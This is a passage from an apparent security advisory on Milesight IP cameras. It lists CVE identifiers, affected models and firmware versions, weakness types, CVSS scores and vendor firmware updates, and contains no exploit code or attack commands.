CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C2966-RFLWPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS2866-X4TPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS2866-X4TVPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS2866-X4TGPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS2841-X36TPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS2841-X36TPC/W <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS2867-X5TPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS2961-X12TPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) TS8266-FPC/P <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C2966-X12RLPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C2966-X12RLVPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C5366-X12LPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C5366-X12LVPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-C5361-X12LPC <=T_45.8.0.3-r9 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx66-xxxxGOPC <=45.8.0.2-AIoT-r4 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) SC211 <=C_21.1.0.8-r4 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) SP111 <=52.8.0.4-r5 (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx66-RFIPKG1 <=63.8.0.4-r1-NX (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx72-RFIPKG1 <=63.8.0.4-r1-NX (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx66-FIPKG1 <=63.8.0.4-r1-NX (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) MS-Cxx72-FIPKG1 <=63.8.0.4-r1-NX (CVE-2026-28747, CVE-2026-27785, CVE-2026-32644, CVE-2026-32649, CVE-2026-20766) CVSS Vendor Equipment Vulnerabilities v3 9.8 Milesight Milesight Cameras Authorization Bypass Through User-Controlled Key, Use of Hard-coded Credentials, Use of Hard-coded Cryptographic Key, Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), Heap-based Buffer Overflow Background Critical Infrastructure Sectors: Commercial Facilities Countries/Areas Deployed: Worldwide Company Headquarters Location: China Vulnerabilities Expand All + CVE-2026-28747 A weak key generation vulnerability exists in specific firmware versions of Milesight AIOT cameras. View CVE Details Affected Products Milesight Cameras Vendor: Milesight Product Version: Milesight MS-Cxx63-PD: <=51.7.0.77-r12, Milesight MS-Cxx64-xPD: <=51.7.0.77-r12, Milesight MS-Cxx73-xPD: <=51.7.0.77-r12, Milesight MS-Cxx75-xxPD: <=51.7.0.77-r12, Milesight MS-Cxx83-xPD: <=51.7.0.77-r12, Milesight MS-Cxx74-PA: <=3x.8.0.3-r11, Milesight MS-C8477-HPG1: <=63.8.0.4-r3, Milesight MS-C8477-PC: <=48.8.0.4-r3, Milesight MS-C5321-FPE: <=62.8.0.4-r5, Milesight MS-Cxx72-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx62-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx52-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxGPE: <=61.8.0.5-r2, Milesight MS-Cxx61-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx67-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx71-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx41-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx76-PE: <=61.8.0.5-r2, Milesight MS-Cxx65-PE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxG1: <=63.8.0.5-r3, Milesight MS-Cxx62-xxxG1: <=63.8.0.5-r3, Milesight MS-Cxx72-xxxG1: <=63.8.0.5-r3, Milesight MS-CQxx31-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-CQxx68-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-CQxx72-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-Nxxxx-NxE: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxC: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxE: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxG: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxH: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxT: <=7x.9.0.19-r5, Milesight PMC8266-FPE: <=PO_61.8.0.4_LPR, Milesight PMC8266-FGPE: <=PO_61.8.0.4_LPR, Milesight PM3322-E: <=PI_61.8.0.3_LPR-r3, Milesight TS4466-X4RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS5366-X12RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-X4RIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-RFIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-RFIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-X4RIWG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIWG1: <=T_63.8.0.4_LPR-r3, Milesight TS5510-GVH: <=T_47.8.0.4_LPR-r7, Milesight TS5510-GH: <=T_47.8.0.4_LPR-r6, Milesight TS5511-GVH: <=T_47.8.0.4_LPR-r6, Milesight TS2966-X12TPE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RPE: <=T_61.8.0.4_LPR-r3, Milesight TS5366-X12PE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4PE: <=T_61.8.0.4_LPR-r3, Milesight TS2966-X12TVPE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RVPE: <=T_61.8.0.4_LPR-r3, Milesight TS5366-X12VPE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4VPE: <=T_61.8.0.4_LPR-r3, Milesight TS4441-X36RPE: <=T_61.8.0.4_LPR-r3, Milesight TS4441-X36RE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RWE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4WE: <=T_61.8.0.4_LPR-r3, Milesight MS-C2964-RFLPC: <=T_45.8.0.3-r9, Milesight MS-C2972-RFLPC: <=T_45.8.0.3-r9, Milesight MS-C2966-RFLWPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TVPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TGPC: <=T_45.8.0.3-r9, Milesight TS2841-X36TPC: <=T_45.8.0.3-r9, Milesight TS2841-X36TPC/W: <=T_45.8.0.3-r9, Milesight TS2867-X5TPC: <=T_45.8.0.3-r9, Milesight TS2961-X12TPC: <=T_45.8.0.3-r9, Milesight TS8266-FPC/P: <=T_45.8.0.3-r9, Milesight MS-C2966-X12RLPC: <=T_45.8.0.3-r9, Milesight MS-C2966-X12RLVPC: <=T_45.8.0.3-r9, Milesight MS-C5366-X12LPC: <=T_45.8.0.3-r9, Milesight MS-C5366-X12LVPC: <=T_45.8.0.3-r9, Milesight MS-C5361-X12LPC: <=T_45.8.0.3-r9, Milesight MS-Cxx66-xxxxGOPC: <=45.8.0.2-AIoT-r4, Milesight SC211: <=C_21.1.0.8-r4, Milesight SP111: <=52.8.0.4-r5, Milesight MS-Cxx66-RFIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx72-RFIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx66-FIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx72-FIPKG1: <=63.8.0.4-r1-NX Product Status: known_affected Remediations Mitigation Milesight advises all users to update their device to the latest firmware versions of PE/PC/PA found at https://www.milesight.com/support/download/firmware.  https://www.milesight.com/support/download/firmware Vendor fix MS-Cxx63-PD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx64-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx73-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx75-xxPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx83-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx74-PA: 3x.8.0.3-r11 and prior versions: Update to 3x.8.0.3-r13 Vendor fix MS-C8477-HPG1: 63.8.0.4-r3 and prior versions: Update to 63.8.0.4-r4 Vendor fix MS-C8477-PC: 48.8.0.4-r3 and prior versions: Update to 48.8.0.4-r4 Vendor fix MS-C5321-FPE: 62.8.0.4-r5 and prior versions: Update to 62.8.0.4-r6 Vendor fix MS-Cxx72-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx62-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx52-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxGPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx61-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx67-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx71-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx41-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx76-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx65-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-Cxx62-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-Cxx72-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-CQxx31-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-CQxx68-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-CQxx72-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-Nxxxx-NxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxC: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxG: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxH: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxT: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix PMC8266-FPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1 Vendor fix PMC8266-FGPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1 Vendor fix PM3322-E: PI_61.8.0.3_LPR-r3 and prior versions: Update to PI_61.8.0.3-r5 Vendor fix TS4466-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS5366-X12RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS5510-GVH: T_47.8.0.4_LPR-r7 and prior versions: Update to T_47.8.0.4-r8 Vendor fix TS5510-GH: T_47.8.0.4_LPR-r6 and prior versions : Update to T_47.8.0.4-r8 Vendor fix TS5511-GVH: T_47.8.0.4_LPR-r6 and prior versions: Update to T_47.8.0.4-r8 Vendor fix TS2966-X12TPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS5366-X12PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS2966-X12TVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS5366-X12VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4441-X36RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4441-X36RE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RWE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4WE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix MS-C2964-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2972-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-RFLWPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TGPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2841-X36TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2841-X36TPC/W: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2867-X5TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2961-X12TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS8266-FPC/P: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-X12RLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-X12RLVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5366-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5366-X12LVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5361-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-Cxx66-xxxxGOPC : 45.8.0.2-AIoT-r4 and prior versions: Update to 45.8.0.2-AIoT-r5 Vendor fix SC211: C_21.1.0.8-r4 and prior versions: Update to C_21.1.0.8-r5 Vendor fix SP111: 52.8.0.4-r5 and prior versions: Update to 52.8.0.4-r6 Vendor fix MS-Cxx66-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx72-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx66-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx72-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Mitigation Milesight asks all users to report potential security vulnerabilities to security@milesight.com. mailto:security@milesight.com Mitigation Learn more: Milesight Vulnerability Reporting Policy https://www.milesight.com/legal/vulnerability-report Relevant CWE: CWE-639 Authorization Bypass Through User-Controlled Key Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2026-27785 Specific firmware versions of Milesight AIOT camera firmware contain hard-coded credentials. View CVE Details Affected Products Milesight Cameras Vendor: Milesight Product Version: Milesight MS-Cxx63-PD: <=51.7.0.77-r12, Milesight MS-Cxx64-xPD: <=51.7.0.77-r12, Milesight MS-Cxx73-xPD: <=51.7.0.77-r12, Milesight MS-Cxx75-xxPD: <=51.7.0.77-r12, Milesight MS-Cxx83-xPD: <=51.7.0.77-r12, Milesight MS-Cxx74-PA: <=3x.8.0.3-r11, Milesight MS-C8477-HPG1: <=63.8.0.4-r3, Milesight MS-C8477-PC: <=48.8.0.4-r3, Milesight MS-C5321-FPE: <=62.8.0.4-r5, Milesight MS-Cxx72-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx62-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx52-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxGPE: <=61.8.0.5-r2, Milesight MS-Cxx61-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx67-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx71-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx41-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx76-PE: <=61.8.0.5-r2, Milesight MS-Cxx65-PE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxG1: <=63.8.0.5-r3, Milesight MS-Cxx62-xxxG1: <=63.8.0.5-r3, Milesight MS-Cxx72-xxxG1: <=63.8.0.5-r3, Milesight MS-CQxx31-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-CQxx68-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-CQxx72-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-Nxxxx-NxE: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxC: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxE: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxG: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxH: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxT: <=7x.9.0.19-r5, Milesight PMC8266-FPE: <=PO_61.8.0.4_LPR, Milesight PMC8266-FGPE: <=PO_61.8.0.4_LPR, Milesight PM3322-E: <=PI_61.8.0.3_LPR-r3, Milesight TS4466-X4RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS5366-X12RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-X4RIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-RFIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-RFIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-X4RIWG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIWG1: <=T_63.8.0.4_LPR-r3, Milesight TS5510-GVH: <=T_47.8.0.4_LPR-r7, Milesight TS5510-GH: <=T_47.8.0.4_LPR-r6, Milesight TS5511-GVH: <=T_47.8.0.4_LPR-r6, Milesight TS2966-X12TPE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RPE: <=T_61.8.0.4_LPR-r3, Milesight TS5366-X12PE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4PE: <=T_61.8.0.4_LPR-r3, Milesight TS2966-X12TVPE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RVPE: <=T_61.8.0.4_LPR-r3, Milesight TS5366-X12VPE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4VPE: <=T_61.8.0.4_LPR-r3, Milesight TS4441-X36RPE: <=T_61.8.0.4_LPR-r3, Milesight TS4441-X36RE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RWE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4WE: <=T_61.8.0.4_LPR-r3, Milesight MS-C2964-RFLPC: <=T_45.8.0.3-r9, Milesight MS-C2972-RFLPC: <=T_45.8.0.3-r9, Milesight MS-C2966-RFLWPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TVPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TGPC: <=T_45.8.0.3-r9, Milesight TS2841-X36TPC: <=T_45.8.0.3-r9, Milesight TS2841-X36TPC/W: <=T_45.8.0.3-r9, Milesight TS2867-X5TPC: <=T_45.8.0.3-r9, Milesight TS2961-X12TPC: <=T_45.8.0.3-r9, Milesight TS8266-FPC/P: <=T_45.8.0.3-r9, Milesight MS-C2966-X12RLPC: <=T_45.8.0.3-r9, Milesight MS-C2966-X12RLVPC: <=T_45.8.0.3-r9, Milesight MS-C5366-X12LPC: <=T_45.8.0.3-r9, Milesight MS-C5366-X12LVPC: <=T_45.8.0.3-r9, Milesight MS-C5361-X12LPC: <=T_45.8.0.3-r9, Milesight MS-Cxx66-xxxxGOPC: <=45.8.0.2-AIoT-r4, Milesight SC211: <=C_21.1.0.8-r4, Milesight SP111: <=52.8.0.4-r5, Milesight MS-Cxx66-RFIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx72-RFIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx66-FIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx72-FIPKG1: <=63.8.0.4-r1-NX Product Status: known_affected Remediations Mitigation Milesight advises all users to update their device to the latest firmware versions of PE/PC/PA found at https://www.milesight.com/support/download/firmware.  https://www.milesight.com/support/download/firmware Vendor fix MS-Cxx63-PD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx64-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx73-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx75-xxPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx83-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx74-PA: 3x.8.0.3-r11 and prior versions: Update to 3x.8.0.3-r13 Vendor fix MS-C8477-HPG1: 63.8.0.4-r3 and prior versions: Update to 63.8.0.4-r4 Vendor fix MS-C8477-PC: 48.8.0.4-r3 and prior versions: Update to 48.8.0.4-r4 Vendor fix MS-C5321-FPE: 62.8.0.4-r5 and prior versions: Update to 62.8.0.4-r6 Vendor fix MS-Cxx72-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx62-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx52-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxGPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx61-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx67-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx71-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx41-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx76-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx65-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-Cxx62-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-Cxx72-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-CQxx31-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-CQxx68-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-CQxx72-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-Nxxxx-NxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxC: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxG: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxH: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxT: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix PMC8266-FPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1 Vendor fix PMC8266-FGPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1 Vendor fix PM3322-E: PI_61.8.0.3_LPR-r3 and prior versions: Update to PI_61.8.0.3-r5 Vendor fix TS4466-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS5366-X12RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS5510-GVH: T_47.8.0.4_LPR-r7 and prior versions: Update to T_47.8.0.4-r8 Vendor fix TS5510-GH: T_47.8.0.4_LPR-r6 and prior versions : Update to T_47.8.0.4-r8 Vendor fix TS5511-GVH: T_47.8.0.4_LPR-r6 and prior versions: Update to T_47.8.0.4-r8 Vendor fix TS2966-X12TPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS5366-X12PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4PE: T_61.8.0.4_LPR-r3 and prior versions: 